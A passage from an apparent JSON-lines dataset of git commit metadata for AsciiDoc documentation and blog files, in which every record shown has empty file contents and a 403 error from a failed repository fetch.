ticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,alexshadow007\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85784b8b0dc6fe33e532d84a5d789b6c60871a78","subject":"Update 2018-06-04-php-Documentor.adoc","message":"Update 2018-06-04-php-Documentor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-04-php-Documentor.adoc","new_file":"_posts\/2018-06-04-php-Documentor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f029379e6df334d41deeca25bd186ce5c652c9f","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 
2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10fb4377454631fa56f3ba8ddced5f16b7d7252d","subject":"tep-1001: Add commodities and currencies links","message":"tep-1001: Add commodities and currencies links\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/readme.adoc","new_file":"docs\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfab994c62025fcc1863539cfd782ce74ec6ac83","subject":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","message":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a25aa1d91dc29659d7fa1dfea972018642bd5b0","subject":"Added Camel 2.20.4 release notes to docs","message":"Added Camel 2.20.4 release notes to 
docs\n","repos":"christophd\/camel,punkhorn\/camel-upstream,tdiesler\/camel,kevinearls\/camel,tadayosi\/camel,sverkera\/camel,anoordover\/camel,pmoerenhout\/camel,mcollovati\/camel,zregvart\/camel,alvinkwekel\/camel,zregvart\/camel,apache\/camel,kevinearls\/camel,nikhilvibhav\/camel,onders86\/camel,nikhilvibhav\/camel,sverkera\/camel,jamesnetherton\/camel,pax95\/camel,davidkarlsen\/camel,jamesnetherton\/camel,gnodet\/camel,anoordover\/camel,ullgren\/camel,pmoerenhout\/camel,tdiesler\/camel,kevinearls\/camel,mcollovati\/camel,Fabryprog\/camel,ullgren\/camel,punkhorn\/camel-upstream,pax95\/camel,cunningt\/camel,Fabryprog\/camel,objectiser\/camel,nicolaferraro\/camel,onders86\/camel,adessaigne\/camel,CodeSmell\/camel,alvinkwekel\/camel,nicolaferraro\/camel,adessaigne\/camel,DariusX\/camel,objectiser\/camel,kevinearls\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,DariusX\/camel,tadayosi\/camel,objectiser\/camel,gnodet\/camel,sverkera\/camel,pmoerenhout\/camel,cunningt\/camel,gnodet\/camel,anoordover\/camel,sverkera\/camel,alvinkwekel\/camel,cunningt\/camel,ullgren\/camel,apache\/camel,adessaigne\/camel,cunningt\/camel,adessaigne\/camel,onders86\/camel,tdiesler\/camel,gnodet\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,jamesnetherton\/camel,zregvart\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,pax95\/camel,onders86\/camel,mcollovati\/camel,anoordover\/camel,mcollovati\/camel,christophd\/camel,christophd\/camel,pmoerenhout\/camel,sverkera\/camel,kevinearls\/camel,pax95\/camel,objectiser\/camel,alvinkwekel\/camel,tadayosi\/camel,DariusX\/camel,Fabryprog\/camel,DariusX\/camel,sverkera\/camel,christophd\/camel,CodeSmell\/camel,tdiesler\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,ullgren\/camel,pax95\/camel,anoordover\/camel,davidkarlsen\/camel,kevinearls\/camel,cunningt\/camel,pmoerenhout\/camel,gnodet\/camel,CodeSmell\/camel,christophd\/camel,nikhilvibhav\/camel,CodeSmell\/camel,davidkarlsen\/camel,apache\/camel,Fabryprog\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,anoordover\/camel,apache\/camel,jamesnetherton\/camel,zregvart\/camel,onders86\/camel,adessaigne\/camel,davidkarlsen\/camel,jamesnetherton\/camel,apache\/camel,apache\/camel,nicolaferraro\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2204-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2204-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"931fb6b34fb9f075181ee71b1c31592cbdfe73c7","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79641f4d4004b31742af04606097d2a0dc9acb9d","subject":"Update 2017-02-28-Document-Title.adoc","message":"Update 
2017-02-28-Document-Title.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-02-28-Document-Title.adoc","new_file":"_posts\/2017-02-28-Document-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"304ff0fe58ca47e5f378cb2a946734d748a52107","subject":"y2b create post Have I Finally Found The Ultimate Keyboard?","message":"y2b create post Have I Finally Found The Ultimate Keyboard?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-04-Have-I-Finally-Found-The-Ultimate-Keyboard.adoc","new_file":"_posts\/2017-03-04-Have-I-Finally-Found-The-Ultimate-Keyboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"241e45032d2081a7cbf0b29cebad561376d4c878","subject":"[README] Add SARTRE in the success story.","message":"[README] Add SARTRE in the success story.","repos":"DevFactory\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,tpiotrow\/afc,tpiotrow\/afc,DevFactory\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc,DevFactory\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tpiotrow\/afc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3574bcf91bf1ae5ef1f485a3aef03435e6c0642c","subject":"Problem: grammar could do with a bit of polish","message":"Problem: grammar could do with a bit of polish\n\nSolution: abbreviate and include docs for nix users\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6151e8641f667023e091f1f80af88c492eb275ff","subject":"fixed stupid mistake about README","message":"fixed stupid mistake about README\n","repos":"BakaBBQ\/lunautils","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BakaBBQ\/lunautils.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6be7ad3ca24131517499a43397d98d5c20831401","subject":"Added a README.adoc.","message":"Added a README.adoc.\n","repos":"SBuild-org\/sbuild-eclipse-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SBuild-org\/sbuild-eclipse-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a7306100f3956a9227c55e1028943d3231b59b5","subject":"Start README.asciidoc","message":"Start 
README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"54a7b2b4307869cf0c06cc174efdf874fe9c074d","subject":"First draft of a new index page for the documentation","message":"First draft of a new index page for the documentation\n","repos":"jsight\/rewrite,chkal\/rewrite,chkal\/rewrite,jsight\/rewrite,jsight\/rewrite,jsight\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/index-new.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/index-new.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsight\/rewrite.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d3b9c59019047b52f5f0dc91f4d7a7cb4a09024","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud-incubator\/spring-cloud-kubernetes","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-incubator\/spring-cloud-kubernetes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b281dd69c96636c8a51388b0f6436d0265ad3a33","subject":"Publish 1993-1-1-Puzzle-8-Matrix.adoc","message":"Publish 1993-1-1-Puzzle-8-Matrix.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"1993-1-1-Puzzle-8-Matrix.adoc","new_file":"1993-1-1-Puzzle-8-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4d8ba240b34ff30a0db43cb0cb6ce751dc70dc","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fd21e02cfed290d5dbaa17d31419ec7a7833d2b","subject":"Update 2015-09-04-Turing-Machine.adoc","message":"Update 2015-09-04-Turing-Machine.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2015-09-04-Turing-Machine.adoc","new_file":"_posts\/2015-09-04-Turing-Machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0339de32ffee92fdde4a233f2728dc6997c6527a","subject":"CL: Fast JSON lib","message":"CL: Fast JSON lib\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"fb4d6641c9dfea042a31af882484cf03899576e6","subject":"added a README placeholder","message":"added a README placeholder\n","repos":"sgsfak\/mypixpdq,sgsfak\/mypixpdq,sgsfak\/mypixpdq","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgsfak\/mypixpdq.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7540a607a7b75db5609ac45da37c9e3497dbd6a0","subject":"Added build badge","message":"Added build badge\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91bc05df8b04518fa4852245586dd2cccedb4ddd","subject":"added readme","message":"added readme\n","repos":"cocagne\/zpax,tempbottle\/zpax","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tempbottle\/zpax.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5243576503dcbe074b2160fa08c853624422b71","subject":"Update 2016-10-21-SVGs-and-such.adoc","message":"Update 2016-10-21-SVGs-and-such.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-10-21-SVGs-and-such.adoc","new_file":"_posts\/2016-10-21-SVGs-and-such.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adf350b9f30383a8ea7147f8c78f29f34ecba80e","subject":"Update 2017-04-20-My-first-post.adoc","message":"Update 2017-04-20-My-first-post.adoc","repos":"demo-hubpress\/demo,demo-hubpress\/demo,demo-hubpress\/demo,demo-hubpress\/demo","old_file":"_posts\/2017-04-20-My-first-post.adoc","new_file":"_posts\/2017-04-20-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61f1cc760b26e3df3f8138c70ea7a74951f3c12b","subject":"Delete the file at '_posts\/2017-08-23-Your-Blog-title.adoc'","message":"Delete the file at '_posts\/2017-08-23-Your-Blog-title.adoc'","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38cb4630aebce480bba4895cdda9031ccadcce2f","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18fb248f3d772e93ad5fc111bc5508e909d656f3","subject":"fixed the jar name in the installation (#35)","message":"fixed the jar name in the installation (#35)\n\nalternatively could have changed the version in the pom.xml file","repos":"neo4j-graphql\/neo4j-graphql,neo4j-graphql\/neo4j-graphql,GraphGrid\/neo4j-graphql,GraphGrid\/neo4j-graphql","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-graphql\/neo4j-graphql.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96d1c00194f30c5951be6bcebf98bfb79b107616","subject":"Update 2016-08-16-Hubpress.adoc","message":"Update 2016-08-16-Hubpress.adoc","repos":"sanctumware\/hubpress,sanctumware\/hubpress,sanctumware\/hubpress,sanctumware\/hubpress","old_file":"_posts\/2016-08-16-Hubpress.adoc","new_file":"_posts\/2016-08-16-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sanctumware\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4291a858e92bbace93a8fea48a232b5591857983","subject":"Minor fixes","message":"Minor fixes\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/lab.adoc","new_file":"lab\/lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0a5095c7c081a3164301cfb0a794bcfb89666aa","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acd06927b60b264fae223504482295ad1474c158","subject":"module-smart_stringencoders.adoc: Adding documentation for ibmod_smart_stringencoders. RNS-1315.","message":"module-smart_stringencoders.adoc: Adding documentation for ibmod_smart_stringencoders. 
RNS-1315.\n","repos":"ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee","old_file":"docs\/reference-manual\/module-smart_stringencoders.adoc","new_file":"docs\/reference-manual\/module-smart_stringencoders.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/b1v1r\/ironbee.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"567668b76be0d3f3fd97519e8d047b56472f7ca6","subject":"Update 2017-06-08-shortage.adoc","message":"Update 2017-06-08-shortage.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-08-shortage.adoc","new_file":"_posts\/2017-06-08-shortage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a0033527209240ac0f8eac142bdbe09fa5d170d","subject":"Update 2015-10-25-Curso-de-Email-Marketing-de-Rackcode-or-Introduccion.adoc","message":"Update 2015-10-25-Curso-de-Email-Marketing-de-Rackcode-or-Introduccion.adoc","repos":"Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io","old_file":"_posts\/2015-10-25-Curso-de-Email-Marketing-de-Rackcode-or-Introduccion.adoc","new_file":"_posts\/2015-10-25-Curso-de-Email-Marketing-de-Rackcode-or-Introduccion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0389273ea0f7a52c899d3b3f38c8acb829df0d18","subject":"Update 2016-10-10-Interfacing-with-MATLAB-Real-Time-HD-Video-Streaming.adoc","message":"Update 2016-10-10-Interfacing-with-MATLAB-Real-Time-HD-Video-Streaming.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2016-10-10-Interfacing-with-MATLAB-Real-Time-HD-Video-Streaming.adoc","new_file":"_posts\/2016-10-10-Interfacing-with-MATLAB-Real-Time-HD-Video-Streaming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c8520f76b021255a7b738837ecd300fcfdc157d","subject":"Add a small sample of `gobin` failing","message":"Add a small sample of `gobin` failing\n","repos":"joyent\/rfd,davepacheco\/rfd,davepacheco\/rfd,davepacheco\/rfd,melloc\/rfd,joyent\/rfd,joyent\/rfd,melloc\/rfd,melloc\/rfd,joyent\/rfd,davepacheco\/rfd,davepacheco\/rfd","old_file":"rfd\/0106\/README.adoc","new_file":"rfd\/0106\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joyent\/rfd.git\/': The requested URL returned error: 
403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"d9f532842c3d64118c6989b80ff77c2f613330d0","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf14b08b05e207cdc1b951361516d3379e66f827","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b99882c39ab893b17a4f2b4ff24d39128c7a828b","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a174eeb507abc85ae8a175fd38b3cfb68f8b64d","subject":"Update 2015-12-29-mBandroid-Tweaks-for-Microsoft-Band2.adoc","message":"Update 2015-12-29-mBandroid-Tweaks-for-Microsoft-Band2.adoc","repos":"alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io,alexandrev\/alexandrev.github.io","old_file":"_posts\/2015-12-29-mBandroid-Tweaks-for-Microsoft-Band2.adoc","new_file":"_posts\/2015-12-29-mBandroid-Tweaks-for-Microsoft-Band2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexandrev\/alexandrev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76f2aac4e0628adab67f9b13a75aa5d294825b11","subject":"lecture notes: dump from riseup etherpad","message":"lecture notes: dump from riseup etherpad","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture05_20170918.adoc","new_file":"lecture05_20170918.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bee71f8d38097c7b897fe00f817d15a28a27cf90","subject":"Update 2016-11-05-About-the-Author.adoc","message":"Update 
2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1c0c8ad683dcd7cf75af6cf8ce956b8509f0639","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dbacc6986eaca599b225e6216c78d6d25d8a1fd","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 